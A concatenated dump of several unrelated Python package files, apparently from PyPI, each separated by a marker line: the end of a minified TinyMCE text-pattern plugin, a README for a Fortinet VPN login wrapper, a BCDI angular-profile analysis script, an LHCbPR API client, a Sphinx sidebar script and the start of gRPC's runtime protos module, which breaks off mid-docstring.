dt.trim(e).length===t.start.length?[]:[{pattern:t,range:G(i.getRoot(),n,0,n,0)}]})}).getOr([])}function z(t,n){return t.create("span",{"data-mce-type":"bookmark",id:n})}function Q(t,n){var r=t.createRng();return r.setStartAfter(n.start),r.setEndBefore(n.end),r}function Y(t,n,r){var e=J(t.getRoot(),r).getOrDie("Unable to resolve path range"),o=e.startContainer,a=e.endContainer,i=0===e.endOffset?a:a.splitText(e.endOffset),u=0===e.startOffset?o:o.splitText(e.startOffset);return{prefix:n,end:i.parentNode.insertBefore(z(t,n+"-end"),i),start:u.parentNode.insertBefore(z(t,n+"-start"),u)}}function Z(t,n,r){pt(t,t.get(n.prefix+"-end"),r),pt(t,t.get(n.prefix+"-start"),r)}function $(n,t,r){n.selection.setRng(r),"inline-format"===t.type?v(t.format,function(t){n.formatter.apply(t)}):n.execCommand(t.cmd,!1,t.value)}function tt(r,e,o){var a=r.selection.getRng();return!1===a.collapsed?[]:V(r,a).bind(function(t){var n=a.startOffset-(o?1:0);return Ot(r,e,a.startContainer,n,t)}).fold(function(){return[]},function(t){return t.matches})}function nt(p,t){var h,n,o,r,e,a,i;0!==t.length&&(h=p.dom,n=p.selection.getBookmark(),o=h,r=t,e=(new Date).getTime(),a="mce_textpattern_"+Math.floor(1e9*Math.random())+ ++bt+String(e),i=b(r,function(t,n){var r=Y(o,a+"_end"+t.length,n.endRng);return t.concat([u(u({},n),{endMarker:r})])},[]),v(b(i,function(t,n){var r=i.length-t.length-1,e=L(n.pattern)?n.endMarker:Y(o,a+"_start"+r,n.startRng);return t.concat([u(u({},n),{startMarker:e})])},[]),function(t){function n(t){return t===g}var r,e,o,a,i,u,f,c,s,l,d,m,g=h.getParent(t.startMarker.start,h.isBlock);L(t.pattern)?(e=t.pattern,o=t.endMarker,a=n,i=Q((r=p).dom,o),_(r.dom,i,a),$(r,e,i)):(u=p,f=t.pattern,c=t.startMarker,s=t.endMarker,l=n,d=u.dom,m=Q(d,s),_(d,Q(d,c),l),_(d,m,l),$(u,f,Q(d,{prefix:c.prefix,start:c.end,end:s.start}))),Z(h,t.endMarker,n),Z(h,t.startMarker,n)}),p.selection.moveToBookmark(n))}function rt(t,n){var r=tt(t,n.inlinePatterns,!0);0<r.length&&t.undoManager.transact(function(){nt(t,r)})}function et(t,n,r){for(var e=0;e<t.length;e++)if(r(t[e],n))return 1}function ot(n,r){var e=[",",".",";",":","!","?"],o=[32];n.on("keydown",function(t){13!==t.keyCode||lt.modifierPressed(t)||!function(o,t){if(o.selection.isCollapsed()){var a=tt(o,t.inlinePatterns,!1),u=X(o,t.blockPatterns);return(0<u.length||0<a.length)&&(o.undoManager.add(),o.undoManager.extra(function(){o.execCommand("mceInsertNewLine")},function(){var i,t,n;o.insertContent("\ufeff"),nt(o,a),i=o,0!==(t=u).length&&(n=i.selection.getBookmark(),v(t,function(t){return e=(n=i).dom,o=(r=t).pattern,a=J(e.getRoot(),r.range).getOrDie("Unable to resolve path range"),V(n,a).each(function(t){"block-format"===o.type?U(o.format,n.formatter)&&n.undoManager.transact(function(){K(n.dom,t,o),n.formatter.apply(o.format)}):"block-command"===o.type&&n.undoManager.transact(function(){K(n.dom,t,o),n.execCommand(o.cmd,!1,o.value)})}),1;var n,r,e,o,a}),i.selection.moveToBookmark(n));var r=o.selection.getRng(),e=q(r.startContainer,r.startOffset,o.dom.getRoot());o.execCommand("mceInsertNewLine"),e.each(function(t){var n=t.container;"\ufeff"===n.data.charAt(t.offset-1)&&(n.deleteData(t.offset-1,1),pt(o.dom,n.parentNode,function(t){return t===o.dom.getRoot()}))})}),1)}}(n,r.get())||t.preventDefault()},!0),n.on("keyup",function(t){et(o,t,function(t,n){return t===n.keyCode&&!1===lt.modifierPressed(n)})&&rt(n,r.get())}),n.on("keypress",function(t){et(e,t,function(t,n){return t.charCodeAt(0)===n.charCode})&&st.setEditorTimeout(n,function(){rt(n,r.get())})})}!function(i){if(!s(i))throw new Error("cases must be an array");if(0===i.length)throw new Error("there must be at least one case");var u=[],r={};v(i,function(t,e){var n=x(t);if(1!==n.length)throw new Error("one and only one name per case");var o=n[0],a=t[o];if(void 0!==r[o])throw new Error("duplicate key detected:"+o);if("cata"===o)throw new Error("cannot have a case named cata (sorry)");if(!s(a))throw new Error("case arguments must be an array");u.push(o),r[o]=function(){for(var r=[],t=0;t<arguments.length;t++)r[t]=arguments[t];var n=r.length;if(n!==a.length)throw new Error("Wrong number of arguments to case "+o+". Expected "+a.length+" ("+a+"), got "+n);return{fold:function(){for(var t=[],n=0;n<arguments.length;n++)t[n]=arguments[n];if(t.length!==i.length)throw new Error("Wrong number of arguments to fold. Expected "+i.length+", got "+t.length);return t[e].apply(null,r)},match:function(t){var n=x(t);if(u.length!==n.length)throw new Error("Wrong number of arguments to match. Expected: "+u.join(",")+"\nActual: "+n.join(","));if(!k(u,function(t){return p(n,t)}))throw new Error("Not all branches were specified when using match. Specified: "+n.join(", ")+"\nRequired: "+u.join(", "));return t[o].apply(null,r)},log:function(t){console.log(t,{constructors:u,constructor:o,params:r})}}}})}([{bothErrors:["error1","error2"]},{firstError:["error1","value2"]},{secondError:["value1","error2"]},{bothValues:["value1","value2"]}]);var at=function(r){return{isValue:d,isError:l,getOr:i(r),getOrThunk:i(r),getOrDie:i(r),or:function(t){return at(r)},orThunk:function(t){return at(r)},fold:function(t,n){return n(r)},map:function(t){return at(t(r))},mapError:function(t){return at(r)},each:function(t){t(r)},bind:function(t){return t(r)},exists:function(t){return t(r)},forall:function(t){return t(r)},toOptional:function(){return w.some(r)}}},it=function(r){return{isValue:l,isError:d,getOr:o,getOrThunk:function(t){return t()},getOrDie:function(){return t=String(r),function(){throw new Error(t)}();var t},or:o,orThunk:function(t){return t()},fold:function(t,n){return t(r)},map:function(t){return it(r)},mapError:function(t){return it(t(r))},each:e,bind:function(t){return it(r)},exists:l,forall:d,toOptional:w.none}},ut={value:at,error:it,fromOption:function(t,n){return t.fold(function(){return it(n)},at)}},ft="undefined"!=typeof window?window:Function("return this;")(),ct=[{start:"*",end:"*",format:"italic"},{start:"**",end:"**",format:"bold"},{start:"#",format:"h1"},{start:"##",format:"h2"},{start:"###",format:"h3"},{start:"####",format:"h4"},{start:"#####",format:"h5"},{start:"######",format:"h6"},{start:"1. ",cmd:"InsertOrderedList"},{start:"* ",cmd:"InsertUnorderedList"},{start:"- ",cmd:"InsertUnorderedList"}],st=tinymce.util.Tools.resolve("tinymce.util.Delay"),lt=tinymce.util.Tools.resolve("tinymce.util.VK"),dt=tinymce.util.Tools.resolve("tinymce.util.Tools"),mt=tinymce.util.Tools.resolve("tinymce.dom.DOMUtils"),gt=tinymce.util.Tools.resolve("tinymce.dom.TextSeeker"),pt=function(t,n,r){var e;n&&t.isEmpty(n)&&!r(n)&&(e=n.parentNode,t.remove(n),pt(t,e,r))},ht=mt.DOM,vt=function(t,r,e){if(!j(t))return w.none();var n=t.textContent;if(0<=r&&r<=n.length)return w.some(I(t,r));var o=gt(ht);return w.from(o.backwards(t,r,W(t),e)).bind(function(t){var n=t.container.data;return vt(t.container,r+n.length,e)})},yt=function(t,n,r){if(!j(t))return w.none();var e=t.textContent;if(n<=e.length)return w.some(I(t,n));var o=gt(ht);return w.from(o.forwards(t,n,W(t),r)).bind(function(t){return yt(t.container,n-e.length,r)})},bt=0,kt=function(e,o,a,t){var i,n,r,u,f,c,s,l=o.start;return n=t.container,r=t.offset,i=l,u=function(t,n){var r=t.data.substring(0,n),e=r.lastIndexOf(i.charAt(i.length-1)),o=r.lastIndexOf(i);return-1!==o?o+i.length:-1!==e?e+1:-1},f=a,s=gt(e,(c=e,function(t){return c.isBlock(t)||p(["BR","IMG","HR","INPUT"],t.nodeName)||"false"===c.getContentEditable(t)})),w.from(s.backwards(n,r,u,f)).bind(function(r){if(r.offset>=l.length){var t=e.createRng();return t.setStart(r.container,r.offset-l.length),t.setEnd(r.container,r.offset),w.some(t)}var n=r.offset-l.length;return vt(r.container,n,a).map(function(t){var n=e.createRng();return n.setStart(t.container,t.offset),n.setEnd(r.container,r.offset),n}).filter(function(t){return t.toString()===l}).orThunk(function(){return kt(e,o,a,I(r.container,0))})})},Ot=function(l,d,m,g,p){var h=l.dom;return q(m,g,h.getRoot()).bind(function(t){var n=h.createRng();n.setStart(p,0),n.setEnd(m,g);for(var r,e=n.toString(),o=0;o<d.length;o++){var a,i,u=d[o],f=u.end;i=r=void 0;if(a=(r=e).length-f.length,""===(i=f)||r.length>=i.length&&r.substr(a,a+i.length)===i){var c=d.slice();c.splice(o,1);var s=function(a,i,u){var f=a.dom,c=f.getRoot(),s=u.pattern,l=u.position.container,d=u.position.offset;return vt(l,d-u.pattern.end.length,i).bind(function(t){var r=G(c,t.container,t.offset,l,d);if(L(s))return w.some({matches:[{pattern:s,startRng:r,endRng:r}],position:t});var n=Ot(a,u.remainingPatterns,t.container,t.offset,i),e=n.getOr({matches:[],position:t}),o=e.position;return function(t,r,n,e,o,a){if(void 0===a&&(a=!1),0!==r.start.length||a)return q(n,e,o).bind(function(n){return kt(t,r,o,n).bind(function(t){if(a){if(t.endContainer===n.container&&t.endOffset===n.offset)return w.none();if(0===n.offset&&t.endContainer.textContent.length===t.endOffset)return w.none()}return w.some(t)})});var i=t.createRng();return i.setStart(n,e),i.setEnd(n,e),w.some(i)}(f,s,o.container,o.offset,i,n.isNone()).map(function(t){var n=G(c,t.startContainer,t.startOffset,t.endContainer,t.endOffset);return{matches:e.matches.concat([{pattern:s,startRng:n,endRng:r}]),position:I(t.startContainer,t.startOffset)}})})}(l,p,{pattern:u,remainingPatterns:c,position:t});if(s.isSome())return s}}return w.none()})};t.add("textpattern",function(r){var t,n,e,o=(t=function(){var t=r.getParam("textpattern_patterns",ct,"array");if(!s(t))return B("The setting textpattern_patterns should be an array"),{inlinePatterns:[],blockPatterns:[]};var n=T(h(t,S));return v(n.errors,function(t){return B(t.message,t.pattern),0}),A(n.values)}(),n=t,{get:function(){return n},set:function(t){n=t}});return ot(r,o),e=o,{setPatterns:function(t){var n=T(h(t,S));if(0<n.errors.length){var r=n.errors[0];throw new Error(r.message+":\n"+JSON.stringify(r.pattern,null,2))}e.set(A(n.values))},getPatterns:function(){return a(a([],h(e.get().inlinePatterns,M),!0),h(e.get().blockPatterns,M),!0)}}})}();
|
PypiClean
|
/fortigate-vpn-login-0.5.tar.gz/fortigate-vpn-login-0.5/README.md
|
# fortigate-vpn-login
Uses `openconnect` to connect to Fortinet VPNs, with extra features. This was created because sometimes we don't want
to use the Forticlient program, or just want a background daemon working for us.
So why not use only `openconnect`? Because there's no proper SAML / OAuth2 support on it, so I decided to do a python
wrapper to extract the `SVPNCOOKIE` from the browser workflow and use it on `openconnect`.
## Usage
To configure this utility on an interactive mode, run:
```bash
fortigate-vpn-login --configure
```
To initiate the SAML workflow on a fortigate ssl vpn server:
```bash
fortigate-vpn-login -s https://vpn-server.example.com
```
To get help and more options:
```bash
fortigate-vpn-login -h
```
## Contents
- [ChangeLog](CHANGELOG.md)
## Setup and usage for local development
Make a virtual environment:
```bash
python3 -m venv venv
source venv/bin/activate
pip install -e .
```
Note that this will also install the local dependencies, which might change after
some time. If needed, you can run `pip install -e .` again to reinstall the
updated dependencies anytime.
|
PypiClean
|
/bcdi-0.3.1.tar.gz/bcdi-0.3.1/scripts/postprocessing/bcdi_angular_profile.py
|
# BCDI: tools for pre(post)-processing Bragg coherent X-ray diffraction imaging data
# (c) 07/2017-06/2019 : CNRS UMR 7344 IM2NP
# (c) 07/2019-present : DESY PHOTON SCIENCE
# authors:
# Jerome Carnis, [email protected]
import json
import os
import pathlib
import tkinter as tk
from numbers import Real
from tkinter import filedialog
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from scipy.interpolate import interp1d
from scipy.ndimage.measurements import center_of_mass
import bcdi.graph.graph_utils as gu
import bcdi.postprocessing.facet_recognition as fu
import bcdi.utils.format as fmt
import bcdi.utils.utilities as util
import bcdi.utils.validation as valid
helptext = """
This script allow to plot the width of a 2D object in function of the angle and a
modulus threshold defining the object from the background. Must be given as input:
the voxel size (possibly different in all directions), the angular step size and an
origin point where all linecuts pass by.
"""
datadir = (
"D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/dataset_1_no_psf/result/"
)
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/dataset_1_newpsf/result/"
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/" \
# "AFM-SEM/P10 beamtime P2 particle size SEM/"
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/dataset_1_newpsf/" \
# "PtNP1_00128/result/" # data folder #
savedir = (
datadir + "linecuts/refined0.25-0.55/test/"
) # 'linecuts_P2_001a/valid_range/' #
# "D:/data/P10_2nd_test_isosurface_Dec2020/data_nanolab/AFM-SEM/" \
# "P10 beamtime P2 particle size SEM/linecuts_P2_001a/"
# results will be saved here, if None it will default to datadir
upsampling_factor = (
5 # integer, 1=no upsampling_factor, 2=voxel size divided by 2 etc...
)
threshold = np.linspace(
0.25, 0.55, num=11
) # [0.471, 0.5, 0.526] # np.round(np.linspace(0.2, 0.5, num=10), decimals=3)
# number or list of numbers between 0 and 1,
# modulus threshold defining the normalized object from the background
angular_step = 1 # in degrees, the linecut directions will be automatically calculated
# in the orthonormal reference frame is given by the array axes.
# It will be corrected for anisotropic voxel sizes.
roi = None # (470, 550, 710, 790) # P2_001a.tif
# (470, 550, 710, 790) # P2_001a.tif
# (220, 680, 620, 1120) # P2_018.tif
# ROI centered around the crystal of interest in the 2D image
# the center of mass will be determined within this ROI when origin is not defined.
# Leave None to use the full array.
origin = None # origin where all the line cuts pass by
# (indices considering the array cropped to roi).
# If None, it will use the center of mass of the modulus in the region defined by roi
voxel_size = 5
# 2.070393374741201 * 0.96829786 # P2_001a.tif
# 0.3448275862068966 * 0.96829786 # P2_018.tif
# positive real number or tuple of 2 or 3 positive real number
# (2 for 2D object, 3 for 3D) (in nm)
sum_axis = 1 # if the object is 3D, it will be summed along that axis
debug = False # True to print the output dictionary and plot the legend
tick_length = 8 # in plots
tick_width = 2 # in plots
comment = "" # string to add to the filename when saving
##################################
# end of user-defined parameters #
##################################
#############################
# define default parameters #
#############################
colors = ("b", "g", "r", "c", "m", "y", "k") # for plots
markers = (".", "v", "^", "<", ">") # for plots
validation_name = "angular_profile"
mpl.rcParams["axes.linewidth"] = tick_width # set the linewidth globally
#########################
# check some parameters #
#########################
valid.valid_item(
value=upsampling_factor, allowed_types=int, min_included=1, name=validation_name
)
valid.valid_container(comment, container_types=str, name=validation_name)
if comment.startswith("_"):
comment = comment[1:]
##################################################
# create the list of directions for the linecuts #
##################################################
angles = np.arange(0, 180, angular_step)
nb_dir = len(angles)
directions = []
for idx in range(nb_dir):
directions.append(
(np.sin(angles[idx] * np.pi / 180), np.cos(angles[idx] * np.pi / 180))
)
#################
# load the data #
#################
plt.ion()
root = tk.Tk()
root.withdraw()
file_path = filedialog.askopenfilename(
initialdir=datadir,
filetypes=[
("NPZ", "*.npz"),
("NPY", "*.npy"),
("CXI", "*.cxi"),
("HDF5", "*.h5"),
("all files", "*.*"),
],
)
_, ext = os.path.splitext(file_path)
if ext in {".png", ".jpg", ".tif"}:
obj = util.image_to_ndarray(filename=file_path, convert_grey=True)
else:
obj, _ = util.load_file(file_path)
obj = abs(obj)
ndim = obj.ndim
if isinstance(voxel_size, Real):
voxel_size = (voxel_size,) * ndim
print(f"Object shape = {obj.shape}, voxel size = {voxel_size}")
if upsampling_factor > 1:
obj, voxel_size = fu.upsample(
array=obj,
upsampling_factor=upsampling_factor,
voxelsizes=voxel_size,
title="modulus",
debugging=debug,
)
print(f"Upsampled object shape = {obj.shape}, upsampled voxel size = {voxel_size}")
else:
valid.valid_container(
voxel_size,
container_types=(list, tuple, np.ndarray),
length=ndim,
item_types=Real,
min_excluded=0,
name="angular_profile",
)
#########################
# check some parameters #
#########################
if ndim == 3:
nbz, nby, nbx = obj.shape
elif ndim == 2:
nby, nbx = obj.shape
else:
raise ValueError(f"obj should be either 2D or 3D, ndim={ndim}")
if roi is None:
roi = (0, nby, 0, nbx)
valid.valid_container(
roi,
container_types=(list, tuple, np.ndarray),
length=4,
item_types=int,
min_included=0,
name="angular_profile",
)
if not (roi[0] < roi[1] <= nby and roi[2] < roi[3] <= nbx):
raise ValueError("roi incompatible with the array shape")
obj = obj[roi[0] : roi[1], roi[2] : roi[3]].astype(float)
if origin is None:
if ndim == 3:
piy, pix = center_of_mass(obj.sum(axis=sum_axis))
else:
piy, pix = center_of_mass(obj)
origin = int(np.rint(piy)), int(np.rint(pix))
valid.valid_container(
origin,
container_types=(list, tuple),
length=2,
item_types=int,
name="angular_profile",
)
savedir = savedir or datadir
pathlib.Path(savedir).mkdir(parents=True, exist_ok=True)
if isinstance(threshold, Real):
threshold = (threshold,)
valid.valid_container(
threshold,
container_types=(list, tuple, np.ndarray),
item_types=Real,
min_included=0,
max_included=1,
name="angular_profile",
)
comment = f"_origin_{origin}_{comment}"
#########################
# normalize the modulus #
#########################
obj = abs(obj) / abs(obj).max() # normalize the modulus to 1
obj[np.isnan(obj)] = 0 # remove nans
fig, axs, _ = gu.imshow_plot(
array=obj,
sum_frames=True,
sum_axis=1,
plot_colorbar=True,
reciprocal_space=False,
vmin=0,
vmax=np.nan,
is_orthogonal=True,
)
gu.savefig(
savedir=savedir,
figure=fig,
axes=axs,
tick_width=tick_width,
tick_length=tick_length,
tick_labelsize=14,
xlabels=axs.get_xlabel(),
ylabels=axs.get_ylabel(),
titles=axs.get_title(),
label_size=16,
filename=f"roi{roi}" + comment,
)
comment = comment + f"_{angular_step}deg"
result = {}
#########################################################
# 3D case (BCDI): loop over thresholds first #
# (the threshold needs to be applied before projecting) #
#########################################################
if ndim == 3:
# remove the voxel size along the projection axis
voxel_size = list(voxel_size)
voxel_size.pop(sum_axis)
valid.valid_container(
voxel_size,
container_types=list,
length=2,
item_types=Real,
min_excluded=0,
name="angular_profile",
)
ang_width = np.empty((len(threshold), nb_dir))
for idx, thres in enumerate(threshold):
# apply the threshold
tmp_obj = np.copy(obj)
tmp_obj[tmp_obj < thres] = 0
if ndim == 3: # project the object
tmp_obj = tmp_obj.sum(axis=sum_axis)
tmp_obj = abs(tmp_obj) / abs(tmp_obj).max() # normalize the modulus to 1
for idy, direction in enumerate(directions):
# get the distances and the modulus values along the linecut
distance, cut = util.linecut(
array=tmp_obj, point=origin, direction=direction, voxel_size=voxel_size
)
# get the indices where the linecut is non_zero
indices = np.nonzero(cut)
# get the width along the cut for that threshold
ang_width[idx, idy] = distance[max(indices[0])] - distance[min(indices[0])]
# store the result in the dictionary
result["ang_width_threshold"] = ang_width
###################################################
# 2D case (SEM): one can create the linecut for #
# each direction first and apply thresholds later #
###################################################
else:
##############################################################################
# calculate the evolution of the width vs threshold for different directions #
##############################################################################
for idx, direction in enumerate(directions):
# get the distances and the modulus values along the linecut
distance, cut = util.linecut(
array=obj, point=origin, direction=direction, voxel_size=voxel_size
)
fit = interp1d(distance, cut)
dist_interp = np.linspace(distance.min(), distance.max(), num=10000)
cut_interp = fit(dist_interp)
width = np.empty(len(threshold))
# calculate the function width vs threshold
for idy, thres in enumerate(threshold):
# calculate the distances where the modulus is equal to threshold
crossings = np.argwhere(cut_interp > thres)
if len(crossings) > 1:
width[idy] = dist_interp[crossings.max()] - dist_interp[crossings.min()]
else:
width[idy] = 0
# store the result in a dictionary
# (cuts can have different lengths depending on the direction)
result[f"direction ({direction[0]:.4f},{direction[1]:.4f})"] = {
"angle": angles[idx],
"distance": distance,
"cut": cut,
"threshold": threshold,
"width": width,
}
if debug: # plot all line cuts
fig = plt.figure(figsize=(12, 9))
ax = plt.subplot(111)
plot_nb = 0
for key, value in result.items():
# value is a dictionary
# {'angle': angles[idx], 'distance': distance, 'cut': cut}
(line,) = ax.plot(
value["distance"],
value["cut"],
color=colors[plot_nb % len(colors)],
marker=markers[(plot_nb // len(colors)) % len(markers)],
fillstyle="none",
markersize=6,
linestyle="-",
linewidth=1,
)
line.set_label(f"{key}")
plot_nb += 1
legend = False
if plot_nb < 15:
legend = True
gu.savefig(
savedir=savedir,
figure=fig,
axes=ax,
tick_width=tick_width,
tick_length=tick_length,
tick_labelsize=16,
xlabels="width (nm)",
ylabels="modulus",
label_size=20,
legend=legend,
legend_labelsize=14,
filename="cuts" + comment,
only_labels=True,
)
##########################################################################
# calculate the evolution of the width vs angle for different thresholds #
##########################################################################
ang_width_threshold = np.empty((len(threshold), nb_dir))
for idx, thres in enumerate(threshold):
tmp_angles = np.empty(nb_dir) # will be used to reorder the angles
angular_width = np.empty(nb_dir)
count = 0
for key, value in result.items(): # iterating over the directions
# value is a dictionary
# {'angle': angles[idx], 'distance': distance, 'cut': cut}
tmp_angles[count] = value["angle"] # index related to the angle/direction
if thres != value["threshold"][idx]:
raise ValueError("ordering error in threshold")
angular_width[count] = value["width"][idx] # index related to the threshold
count += 1
if not np.all(np.isclose(tmp_angles, angles)):
raise ValueError("ordering error in angles")
ang_width_threshold[idx, :] = angular_width
# update the dictionary
result["ang_width_threshold"] = ang_width_threshold
#####################################################
# plot the width vs angle for different thresholds #
#####################################################
fig = plt.figure(figsize=(12, 9))
ax = plt.subplot(111)
for idx, thres in enumerate(threshold):
(line,) = ax.plot(
angles,
result["ang_width_threshold"][idx],
color=colors[idx % len(colors)],
marker=markers[(idx // len(colors)) % len(markers)],
fillstyle="none",
markersize=6,
linestyle="-",
linewidth=1,
)
line.set_label(f"threshold {thres}")
legend = False
if len(threshold) < 15:
legend = True
gu.savefig(
savedir=savedir,
figure=fig,
axes=ax,
tick_width=tick_width,
tick_length=tick_length,
tick_labelsize=14,
xlabels="angle (deg)",
ylabels="width (nm)",
label_size=20,
legend=legend,
legend_labelsize=14,
filename="width_vs_ang" + comment,
only_labels=True,
)
###################
# save the result #
###################
result["threshold"] = threshold
result["angles"] = angles
result["origin"] = origin
result["roi"] = roi
if debug:
print("output dictionary:\n", json.dumps(result, cls=fmt.CustomEncoder, indent=4))
with open(savedir + "ang_width" + comment + ".json", "w", encoding="utf-8") as file:
json.dump(result, file, cls=fmt.CustomEncoder, ensure_ascii=False, indent=4)
plt.ioff()
plt.show()
|
PypiClean
|
/LbNightlyTools-4.0.1-py3-none-any.whl/LbPR/LbPRJobManager.py
|
from future import standard_library
standard_library.install_aliases()
import json
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request
from builtins import object
HEADERS = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
CHECK_SSL = False
def urlopen(url, check_ssl=True):
"""
Wrapper for urllib2.urlopen to enable or disable SSL verification.
"""
if not check_ssl and sys.version_info >= (2, 7, 9):
# with Python >= 2.7.9 SSL certificates are validated by default
# but we can ignore them
from ssl import PROTOCOL_SSLv23, SSLContext
return urllib.request.urlopen(url, context=ssl._create_unverified_context())
return urllib.request.urlopen(url)
class JobManager(object):
"""
Interface to the LHCbPR system
"""
def __init__(self, lhcbpr_api_url, check_ssl=True):
"""
Constructor taking the URL for the LHCbPR server
"""
self._lhcbpr_api_url = lhcbpr_api_url
self._check_ssl = check_ssl
def getJobOptions(self, options_description):
"""Get the list of options from LHCbPR2"""
resp = urlopen(
"%s/options/?description=%s" % (self._lhcbpr_api_url, options_description),
self._check_ssl,
).read()
data = json.loads(resp)
return data["results"][0] if data["count"] else None
def getExecutableOptions(self, executable):
"""Get the list of options from LHCbPR2"""
resp = urlopen(
"%s/executables/?name=%s" % (self._lhcbpr_api_url, executable),
self._check_ssl,
).read()
data = json.loads(resp)
return data["results"][0] if data["count"] else None
def getSetupOptions(self, setup_description):
"""Get the SetupProject options from LHCbPR2"""
if setup_description:
resp = urlopen(
"%s/setups/?description=%s" % (self._lhcbpr_api_url, setup_description),
self._check_ssl,
).read()
data = json.loads(resp)
return data["results"][0] if data["count"] else None
else:
return None
|
PypiClean
|
/py_knife-0.01.28.tar.gz/py_knife-0.01.28/docs/_static/sidebar.js
|
$(function() {
// global elements used by the functions.
// the 'sidebarbutton' element is defined as global after its
// creation, in the add_sidebar_button function
var bodywrapper = $('.bodywrapper');
var sidebar = $('.sphinxsidebar');
var sidebarwrapper = $('.sphinxsidebarwrapper');
// for some reason, the document has no sidebar; do not run into errors
if (!sidebar.length) return;
// original margin-left of the bodywrapper and width of the sidebar
// with the sidebar expanded
var bw_margin_expanded = bodywrapper.css('margin-left');
var ssb_width_expanded = sidebar.width();
// margin-left of the bodywrapper and width of the sidebar
// with the sidebar collapsed
var bw_margin_collapsed = '.8em';
var ssb_width_collapsed = '.8em';
// colors used by the current theme
var dark_color = $('.related').css('background-color');
var light_color = $('.document').css('background-color');
function sidebar_is_collapsed() {
return sidebarwrapper.is(':not(:visible)');
}
function toggle_sidebar() {
if (sidebar_is_collapsed())
expand_sidebar();
else
collapse_sidebar();
}
function collapse_sidebar() {
sidebarwrapper.hide();
sidebar.css('width', ssb_width_collapsed);
bodywrapper.css('margin-left', bw_margin_collapsed);
sidebarbutton.css({
'margin-left': '0',
'height': bodywrapper.height()
});
sidebarbutton.find('span').text('»');
sidebarbutton.attr('title', _('Expand sidebar'));
document.cookie = 'sidebar=collapsed';
}
function expand_sidebar() {
bodywrapper.css('margin-left', bw_margin_expanded);
sidebar.css('width', ssb_width_expanded);
sidebarwrapper.show();
sidebarbutton.css({
'margin-left': ssb_width_expanded-12,
'height': bodywrapper.height()
});
sidebarbutton.find('span').text('«');
sidebarbutton.attr('title', _('Collapse sidebar'));
document.cookie = 'sidebar=expanded';
}
function add_sidebar_button() {
sidebarwrapper.css({
'float': 'left',
'margin-right': '0',
'width': ssb_width_expanded - 28
});
// create the button
sidebar.append(
'<div id="sidebarbutton"><span>«</span></div>'
);
var sidebarbutton = $('#sidebarbutton');
light_color = sidebarbutton.css('background-color');
// find the height of the viewport to center the '<<' in the page
var viewport_height;
if (window.innerHeight)
viewport_height = window.innerHeight;
else
viewport_height = $(window).height();
sidebarbutton.find('span').css({
'display': 'block',
'margin-top': (viewport_height - sidebar.position().top - 20) / 2
});
sidebarbutton.click(toggle_sidebar);
sidebarbutton.attr('title', _('Collapse sidebar'));
sidebarbutton.css({
'color': '#FFFFFF',
'border-left': '1px solid ' + dark_color,
'font-size': '1.2em',
'cursor': 'pointer',
'height': bodywrapper.height(),
'padding-top': '1px',
'margin-left': ssb_width_expanded - 12
});
sidebarbutton.hover(
function () {
$(this).css('background-color', dark_color);
},
function () {
$(this).css('background-color', light_color);
}
);
}
function set_position_from_cookie() {
if (!document.cookie)
return;
var items = document.cookie.split(';');
for(var k=0; k<items.length; k++) {
var key_val = items[k].split('=');
var key = key_val[0].replace(/ /, ""); // strip leading spaces
if (key == 'sidebar') {
var value = key_val[1];
if ((value == 'collapsed') && (!sidebar_is_collapsed()))
collapse_sidebar();
else if ((value == 'expanded') && (sidebar_is_collapsed()))
expand_sidebar();
}
}
}
add_sidebar_button();
var sidebarbutton = $('#sidebarbutton');
set_position_from_cookie();
});
|
PypiClean
|
/mis_modulos-0.1.tar.gz/mis_modulos-0.1/grpc/_runtime_protos.py
|
import sys
import types
from typing import Tuple, Union
_REQUIRED_SYMBOLS = ("_protos", "_services", "_protos_and_services")
_MINIMUM_VERSION = (3, 5, 0)
_UNINSTALLED_TEMPLATE = "Install the grpcio-tools package (1.32.0+) to use the {} function."
_VERSION_ERROR_TEMPLATE = "The {} function is only on available on Python 3.X interpreters."
def _has_runtime_proto_symbols(mod: types.ModuleType) -> bool:
return all(hasattr(mod, sym) for sym in _REQUIRED_SYMBOLS)
def _is_grpc_tools_importable() -> bool:
try:
import grpc_tools # pylint: disable=unused-import # pytype: disable=import-error
return True
except ImportError as e:
# NOTE: It's possible that we're encountering a transitive ImportError, so
# we check for that and re-raise if so.
if "grpc_tools" not in e.args[0]:
raise
return False
def _call_with_lazy_import(
fn_name: str, protobuf_path: str
) -> Union[types.ModuleType, Tuple[types.ModuleType, types.ModuleType]]:
"""Calls one of the three functions, lazily importing grpc_tools.
Args:
fn_name: The name of the function to import from grpc_tools.protoc.
protobuf_path: The path to import.
Returns:
The appropriate module object.
"""
if sys.version_info < _MINIMUM_VERSION:
raise NotImplementedError(_VERSION_ERROR_TEMPLATE.format(fn_name))
else:
if not _is_grpc_tools_importable():
raise NotImplementedError(_UNINSTALLED_TEMPLATE.format(fn_name))
import grpc_tools.protoc # pytype: disable=import-error
if _has_runtime_proto_symbols(grpc_tools.protoc):
fn = getattr(grpc_tools.protoc, '_' + fn_name)
return fn(protobuf_path)
else:
raise NotImplementedError(_UNINSTALLED_TEMPLATE.format(fn_name))
def protos(protobuf_path): # pylint: disable=unused-argument
"""Returns a module generated by the indicated .proto file.
THIS IS AN EXPERIMENTAL API.
Use this function to retrieve classes corresponding to message
definitions in the .proto file.
To inspect the contents of the returned module, use the dir function.
For example:
```
protos = grpc.protos("foo.proto")
print(dir(protos))
```
The returned module object corresponds to the _pb2.py file generated
by protoc. The path is expected to be relative to an entry on sys.path
and all transitive dependencies of the file should also be resolveable
from an entry on sys.path.
To completely disable the machinery behind this function, set the
GRPC_PYTHON_DISABLE_DYNAMIC_STUBS environment variable to "true".
Args:
protobuf_path: The path to the .proto file on the filesystem. This path
must be resolveable from an entry on sys.path and so must all of its
transitive dependencies.
Returns:
A module object corresponding to the message code for the indicated
.proto file. Equivalent to a generated _pb2.py file.
"""
return _call_with_lazy_import("protos", protobuf_path)
def services(protobuf_path): # pylint: disable=unused-argument
"""Returns a module generated by the indicated .proto file.
THIS IS AN EXPERIMENTAL API.
Use this function to retrieve classes and functions corresponding to
service definitions in the .proto file, including both stub and servicer
definitions.
To inspect the contents of the returned module, use the dir function.
For example:
```
services = grpc.services("foo.proto")
print(dir(services))
```
